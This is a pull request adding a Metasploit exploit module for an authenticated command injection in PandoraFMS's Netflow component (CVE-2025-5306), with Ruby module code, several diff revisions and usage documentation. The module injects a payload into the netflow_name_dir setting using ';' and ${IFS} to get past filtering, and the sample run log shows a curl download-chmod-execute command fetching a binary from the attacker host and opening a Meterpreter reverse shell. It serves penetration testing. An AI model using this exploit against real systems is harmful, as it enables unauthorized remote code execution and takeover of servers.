### PR TITLE
Add module for authenticated PandoraFMS command injection (CVE-2025-5306)

### DIFF
--- a/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
+++ b/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
@@ -1,0 +1,75 @@
+## Vulnerable Application
+
+PandoraFMS offers multiple modules that can be turned on or off with an administrative account.
+One of them is Netflow, which is responsible for real-time network monitoring.
+It can collect network data and then report or dump it.
+Once Netflow is configured, it allows you to perform various tasks, such as viewing and exporting network data.
+
+The Netflow explorer contains a vulnerability when an unsanitized parameter from the Netflow configuration is placed into a string that gets executed using the exec() function.
+
+The PandoraFMS can be installed from [here](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/777/Tarball/):
+
+1. Download vulnerable PandoraFMS
+2. Install webserver - Apache2, MySQL, PHP
+3. Following installation steps of PandoraFMS
+4. Run: `sudo apt install nfdump`
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use linux/http/pandora_fms_auth_netflow_rce`
+1. Do: `set rhosts [target IP]`
+1. Do: `set lhost  [attacker IP]`
+1. Do: `set username  [username]`
+1. Do: `set password  [password]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+
+### USERNAME
+
+Login username of existing user.
+
+### PASSWORD
+
+Login password of existing user.
+
+## Scenarios
+
+```
+msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set rhosts 192.168.168.146
+msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set PASSWORD pandora
+msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set USERNAME admin
+msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > run verbose=true 
+[*] Command to run on remote host: curl -so ./khZKmkFYijJ http://192.168.168.128:8080/M1We21fZKyvgtWK9IWStLA;chmod +x ./khZKmkFYijJ;./khZKmkFYijJ&
+[*] Fetch handler listening on 192.168.168.128:8080
+[*] HTTP server started
+[*] Adding resource /M1We21fZKyvgtWK9IWStLA
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] 192.168.168.146:80 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.168.146:80 - Version 7.0.777 detected
+[+] 192.168.168.146:80 - The target is vulnerable. Vulnerable PandoraFMS version 7.0.777 detected
+[*] Client 192.168.168.146 requested /M1We21fZKyvgtWK9IWStLA
+[*] Sending payload to 192.168.168.146 (curl/7.68.0)
+[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.146:54980) at 2025-06-25 12:27:52 +0200
+
+meterpreter > sysinfo
+Computer     : 192.168.168.146
+OS           : Ubuntu 20.04 (Linux 5.15.0-136-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux```
+
+For example:
+
+To do this specific thing, here's how you do it:
+
+```
+msf > use module_name
+msf auxiliary(module_name) > set POWERLEVEL >9000
+msf auxiliary(module_name) > exploit
+```

--- a/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
+++ b/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
@@ -10,9 +10,11 @@ The Netflow explorer contains a vulnerability when an unsanitized parameter from
 The PandoraFMS can be installed from [here](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/777/Tarball/):
 
 1. Download vulnerable PandoraFMS
-2. Install webserver - Apache2, MySQL, PHP
-3. Following installation steps of PandoraFMS
-4. Run: `sudo apt install nfdump`
+1. Install webserver - Apache2, MySQL, PHP8.2+
+1. Disable `strict_mode` in MySQL - `set global sql_mode='';`
+1. Following installation steps of PandoraFMS
+1. Enable Netflow in PandoraFMS settings
+1. Run: `sudo apt install nfdump`
 
 
 ## Verification Steps

--- a/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
+++ b/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
@@ -5,7 +5,8 @@ One of them is Netflow, which is responsible for real-time network monitoring.
 It can collect network data and then report or dump it.
 Once Netflow is configured, it allows you to perform various tasks, such as viewing and exporting network data.
 
-The Netflow explorer contains a vulnerability when an unsanitized parameter from the Netflow configuration is placed into a string that gets executed using the exec() function.
+The Netflow explorer contains a vulnerability,
+when an unsanitized parameter from the Netflow configuration is placed into a string that gets executed using the exec() function.
 
 The PandoraFMS can be installed from [here](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/777/Tarball/):
 

--- a/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
+++ b/documentation/modules/exploit/linux/http/pandora_fms_auth_netflow_rce.md
@@ -62,14 +62,5 @@ Computer     : 192.168.168.146
 OS           : Ubuntu 20.04 (Linux 5.15.0-136-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
-Meterpreter  : x64/linux```
-
-For example:
-
-To do this specific thing, here's how you do it:
-
-```
-msf > use module_name
-msf auxiliary(module_name) > set POWERLEVEL >9000
-msf auxiliary(module_name) > exploit
+Meterpreter  : x64/linux
 ```

--- a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -16,15 +16,12 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
         'Description' => %q{
-          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
+          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
         },
         'License' => MSF_LICENSE,
         'Author' => ['msutovsky-r7'], # researcher, module dev
         'References' => [
-          [ 'OSVDB', '12345' ],
-          [ 'EDB', '12345' ],
-          [ 'URL', 'http://www.example.com'],
-          [ 'CVE', '1978-1234']
+          [ 'CVE', '2025-5306']
         ],
         'Platform' => ['unix', 'linux'],
         'Arch' => [ ARCH_CMD ],
@@ -88,9 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Version #{version} detected")
 
-    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") unless Rex::Version.new(version) < Rex::Version.new('7.0.777.10')
+    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.774'), Rex::Version.new('7.0.777.10'))
 
-    Msf::Exploit::CheckCode::Safe('Running version is not vulnerable')
+    Msf::Exploit::CheckCode::Safe("Running version #{version}, which is not vulnerable")
   end
 
   def get_csrf_token
@@ -105,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Remote
     html = res.get_html_document
 
     fail_with Failure::UnexpectedReply, 'Empty response received' unless html
-    html.at('div[@id="ver_num"]')&.text
 
     @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
 
@@ -158,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
       'vars_post' =>
       {
-        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#;',
+        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#',
         'netflow_daemon' => netflow_daemon_value,
         'netflow_nfdump' => netflow_nfdump_value,
         'netflow_max_resolution' => netflow_max_resolution_value,

--- a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
         'Description' => %q{
-          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
+          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to be present on the system.
         },
         'License' => MSF_LICENSE,
         'Author' => ['msutovsky-r7'], # researcher, module dev
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
 
-    return Msf::Exploit::CheckCode::Safe('Application is not probably PandoraFMS') unless version
+    return Msf::Exploit::CheckCode::Safe('Application is not probably PandoraFMS') if version.blank?
 
     version = version[1..]&.sub('NG', '')
 
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Version #{version} detected")
 
-    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.774'), Rex::Version.new('7.0.777.10'))
+    return Exploit::CheckCode::Appears("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.774'), Rex::Version.new('7.0.777.10'))
 
     Msf::Exploit::CheckCode::Safe("Running version #{version}, which is not vulnerable")
   end
@@ -108,6 +108,13 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with Failure::NotFound, 'Could not found CSRF token' unless @csrf_token
   end
 
+  ##
+  # Checks whether login response was valid and successful. It check whether response code is 200 an if body contains either of following values - id="welcome-icon-header", id="welcome-panel" or "godmode"
+  ##
+  def login_successful?(res)
+    res&.code == 200 && res.body.include?('id="welcome-icon-header"') || res.body.include?('id="welcome_panel"') || res.body.include?('godmode')
+  end
+
   def login
     res = send_request_cgi!({
       'method' => 'POST',
@@ -122,7 +129,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'csrf_code' => @csrf_token
       }
     })
-    fail_with Failure::NoAccess, 'Invalid credentials' unless res&.code == 200 && res.body.include?('id="welcome-icon-header"') || res.body.include?('id="welcome_panel"') || res.body.include?('godmode')
+    fail_with Failure::NoAccess, 'Invalid credentials' unless login_successful?(res)
+  end
+
+  def valid_netflow_options?(opts)
+    opts.each do |item|
+      return false if item.blank?
+    end
   end
 
   def configure_netflow
@@ -140,30 +153,34 @@ class MetasploitModule < Msf::Exploit::Remote
 
     netflow_daemon_value = html.at('input[@name="netflow_daemon"]')&.attributes&.fetch('value', nil)
     netflow_nfdump_value = html.at('input[@name="netflow_nfdump"]')&.attributes&.fetch('value', nil)
-    netflow_nfexpire_value = html.at('input[@name="netflow_nfexpire"]')&.attributes&.fetch('value', nil)
+    html.at('input[@name="netflow_nfexpire"]')&.attributes&.fetch('value', nil)
     netflow_max_resolution_value = html.at('input[@name="netflow_max_resolution"]')&.attributes&.fetch('value', nil)
     netflow_disable_custom_lvfilters_sent_value = html.at('input[@name="netflow_disable_custom_lvfilters_sent"]')&.attributes&.fetch('value', nil)
     netflow_max_lifetime_value = html.at('input[@name="netflow_max_lifetime"]')&.attributes&.fetch('value', nil)
     netflow_interval_value = html.at('select[@name="netflow_interval"]//option[@selected="selected"]')&.attributes&.fetch('value', nil)
 
-    fail_with Failure::Unknown, 'Failed to get existing Netflow configuration' unless netflow_daemon_value && netflow_nfdump_value && netflow_nfexpire_value && netflow_max_resolution_value && netflow_disable_custom_lvfilters_sent_value && netflow_max_lifetime_value && netflow_interval_value
+    request_data = {
+      'netflow_daemon' => netflow_daemon_value,
+      'netflow_nfdump' => netflow_nfdump_value,
+      'netflow_max_resolution' => netflow_max_resolution_value,
+      'netflow_disable_custom_lvfilters_sent' => netflow_disable_custom_lvfilters_sent_value,
+      'netflow_max_lifetime' => netflow_max_lifetime_value,
+      'netflow_interval' => netflow_interval_value
+    }
+
+    fail_with Failure::Unknown, 'Failed to get existing Netflow configuration' unless valid_netflow_options?(request_data)
+
+    request_data.merge!({
+      'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#',
+      'update_config' => '1',
+      'upd_button' => 'Update'
+    })
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
-      'vars_post' =>
-      {
-        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#',
-        'netflow_daemon' => netflow_daemon_value,
-        'netflow_nfdump' => netflow_nfdump_value,
-        'netflow_max_resolution' => netflow_max_resolution_value,
-        'netflow_disable_custom_lvfilters_sent' => netflow_disable_custom_lvfilters_sent_value,
-        'netflow_max_lifetime' => netflow_max_lifetime_value,
-        'netflow_interval' => netflow_interval_value,
-        'update_config' => '1',
-        'upd_button' => 'Update'
-      }
+      'vars_post' => request_data
     })
     fail_with Failure::PayloadFailed, 'Failed to configure Netflow' unless res&.code == 200
   end

--- a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -1,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['msutovsky-r7'], # researcher, module dev
+        'References' => [
+          [ 'OSVDB', '12345' ],
+          [ 'EDB', '12345' ],
+          [ 'URL', 'http://www.example.com'],
+          [ 'CVE', '1978-1234']
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ ARCH_CMD ],
+        'Privileged' => false,
+        'Targets' => [
+
+          [
+            'Linux/Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ ARCH_CMD]
+            }
+          ]
+        ],
+        #        'Payload' => {
+        #          'BadChars' => " "
+        #        },
+        'DisclosureDate' => '2025-12-30',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to PandoraFMS application', '/pandora_console/']),
+        OptString.new('USERNAME', [true, 'Username to PandoraFMS applicaton', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password to PandoraFMS application', 'pandora'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'login' => '1' },
+      'keep_cookies' => true
+    })
+    return Msf::Exploit::CheckCode::Unknown('Received unexpected response') unless res&.code == 200
+
+    html = res.get_html_document
+
+    return Msf::Exploit::CheckCode::Unknown('Response seems to be empty') unless html
+
+    version = html.at('div[@id="ver_num"]')&.text
+
+    @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
+
+    return Msf::Exploit::CheckCode::Safe('Application is not probably PandoraFMS') unless version
+
+    version = version[1..]&.sub('NG', '')
+
+    vprint_warning('Token was not parsed, will try again') unless @csrf_token
+
+    vprint_status("Version #{version} detected")
+
+    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.776'), Rex::Version.new('7.0.777'))
+
+    Msf::Exploit::CheckCode::Safe('Running version is not vulnerable')
+  end
+
+  def get_csrf_token
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'login' => '1' },
+      'keep_cookies' => true
+    })
+    fail_with Failure::UnexpectedReply, 'Recevied unexpected response' unless res&.code == 200
+
+    html = res.get_html_document
+
+    fail_with Failure::UnexpectedReply, 'Empty response received' unless html
+    html.at('div[@id="ver_num"]')&.text
+
+    @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
+
+    fail_with Failure::NotFound, 'Could not found CSRF token' unless @csrf_token
+  end
+
+  def login
+    res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'keep_cookies' => true,
+      'vars_get' => { 'login' => '1' },
+      'vars_post' =>
+      {
+        'nick' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD'],
+        'login_button' => "Let's go",
+        'csrf_code' => @csrf_token
+      }
+    })
+    fail_with Failure::NoAccess, 'Invalid credentials' unless res&.code == 200 && res.body.include?('id="welcome-icon-header"') || res.body.include?('id="welcome_panel"') || res.body.include?('godmode')
+  end
+
+  def configure_netflow
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' }
+    })
+
+    fail_with Failure::NotFound, 'Netflow might not be enabled' unless res&.code == 200
+
+    html = res.get_html_document
+
+    fail_with Failure::UnexpectedReply, 'Unexpected response when trying to configure Netflow' unless html
+
+    netflow_daemon_value = html.at('input[@name="netflow_daemon"]')&.attributes&.fetch('value', nil)
+    netflow_nfdump_value = html.at('input[@name="netflow_nfdump"]')&.attributes&.fetch('value', nil)
+    netflow_nfexpire_value = html.at('input[@name="netflow_nfexpire"]')&.attributes&.fetch('value', nil)
+    netflow_max_resolution_value = html.at('input[@name="netflow_max_resolution"]')&.attributes&.fetch('value', nil)
+    netflow_disable_custom_lvfilters_sent_value = html.at('input[@name="netflow_disable_custom_lvfilters_sent"]')&.attributes&.fetch('value', nil)
+    netflow_max_lifetime_value = html.at('input[@name="netflow_max_lifetime"]')&.attributes&.fetch('value', nil)
+    netflow_interval_value = html.at('select[@name="netflow_interval"]//option[@selected="selected"]')&.attributes&.fetch('value', nil)
+
+    fail_with Failure::Unknown, 'Failed to get existing Netflow configuration' unless netflow_daemon_value && netflow_nfdump_value && netflow_nfexpire_value && netflow_max_resolution_value && netflow_disable_custom_lvfilters_sent_value && netflow_max_lifetime_value && netflow_interval_value
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
+      'vars_post' =>
+      {
+        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + ';',
+        'netflow_daemon' => netflow_daemon_value,
+        'netflow_nfdump' => netflow_nfdump_value,
+        'netflow_max_resolution' => netflow_max_resolution_value,
+        'netflow_disable_custom_lvfilters_sent' => netflow_disable_custom_lvfilters_sent_value,
+        'netflow_max_lifetime' => netflow_max_lifetime_value,
+        'netflow_interval' => netflow_interval_value,
+        'update_config' => '1',
+        'upd_button' => 'Update'
+      }
+    })
+    fail_with Failure::PayloadFailed, 'Failed to configure Netflow' unless res&.code == 200
+  end
+
+  def trigger_payload
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_get' => { 'sec' => 'network_traffic', 'sec2' => 'operation/netflow/netflow_explorer' }
+    })
+  end
+
+  def exploit
+    # do we have csrf token already
+    get_csrf_token unless @csrf_token
+
+    login
+
+    configure_netflow
+
+    trigger_payload
+  end
+end

--- a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -35,15 +35,16 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux/Unix Command',
             {
               'Platform' => ['unix', 'linux'],
-              'Arch' => [ ARCH_CMD],
-              'Payload' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
+              'Arch' => [ ARCH_CMD]
             }
           ]
         ],
         'DisclosureDate' => '2025-12-30',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'RPORT' => 80
+          'RPORT' => 80,
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+          'FETCH_WRITABLE_DIR' => '/tmp'
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -87,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Version #{version} detected")
 
-    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") unless Rex::Version.new(version) >= Rex::Version.new('7.0.777.10')
+    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") unless Rex::Version.new(version) < Rex::Version.new('7.0.777.10')
 
     Msf::Exploit::CheckCode::Safe('Running version is not vulnerable')
   end

--- a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -39,9 +39,6 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-        #        'Payload' => {
-        #          'BadChars' => " "
-        #        },
         'DisclosureDate' => '2025-12-30',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
@@ -89,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Version #{version} detected")
 
-    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.776'), Rex::Version.new('7.0.777'))
+    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") unless Rex::Version.new(version) >= Rex::Version.new('7.0.777.10')
 
     Msf::Exploit::CheckCode::Safe('Running version is not vulnerable')
   end

--- a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
+++ b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux/Unix Command',
             {
               'Platform' => ['unix', 'linux'],
-              'Arch' => [ ARCH_CMD]
+              'Arch' => [ ARCH_CMD],
+              'Payload' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
             }
           ]
         ],
@@ -156,7 +157,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
       'vars_post' =>
       {
-        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + ';',
+        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#;',
         'netflow_daemon' => netflow_daemon_value,
         'netflow_nfdump' => netflow_nfdump_value,
         'netflow_max_resolution' => netflow_max_resolution_value,


### PR DESCRIPTION
This PR adds a module for PandoraFMS command injection in Netflow component. The module requires **set of user credentials** and **it requires Netflow binaries present on the target system**.
## Vulnerable Application

PandoraFMS offers multiple modules that can be turned on or off with an administrative account.
One of them is Netflow, which is responsible for real-time network monitoring.
It can collect network data and then report or dump it.
Once Netflow is configured, it allows you to perform various tasks, such as viewing and exporting network data.

The Netflow explorer contains a vulnerability when an unsanitized parameter from the Netflow configuration is placed into a string that gets executed using the exec() function.

The PandoraFMS can be installed from [here](https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/777/Tarball/):

1. Download vulnerable PandoraFMS
2. Install webserver - Apache2, MySQL, PHP
3. Following installation steps of PandoraFMS
4. Run: `sudo apt install nfdump`


## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use linux/http/pandora_fms_auth_netflow_rce`
1. Do: `set rhosts [target IP]`
1. Do: `set lhost  [attacker IP]`
1. Do: `set username  [username]`
1. Do: `set password  [password]`
1. Do: `run`
1. You should get a shell.

## Options


### USERNAME

Login username of existing user.

### PASSWORD

Login password of existing user.

## Scenarios

```
msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set rhosts 192.168.168.146
msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set PASSWORD pandora
msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > set USERNAME admin
msf6 exploit(linux/http/pandora_fms_auth_netflow_rce) > run verbose=true 
[*] Command to run on remote host: curl -so ./khZKmkFYijJ http://192.168.168.128:8080/M1We21fZKyvgtWK9IWStLA;chmod +x ./khZKmkFYijJ;./khZKmkFYijJ&
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /M1We21fZKyvgtWK9IWStLA
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] 192.168.168.146:80 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.168.146:80 - Version 7.0.777 detected
[+] 192.168.168.146:80 - The target is vulnerable. Vulnerable PandoraFMS version 7.0.777 detected
[*] Client 192.168.168.146 requested /M1We21fZKyvgtWK9IWStLA
[*] Sending payload to 192.168.168.146 (curl/7.68.0)
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.146:54980) at 2025-06-25 12:27:52 +0200
meterpreter > sysinfo
Computer     : 192.168.168.146
OS           : Ubuntu 20.04 (Linux 5.15.0-136-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux```
```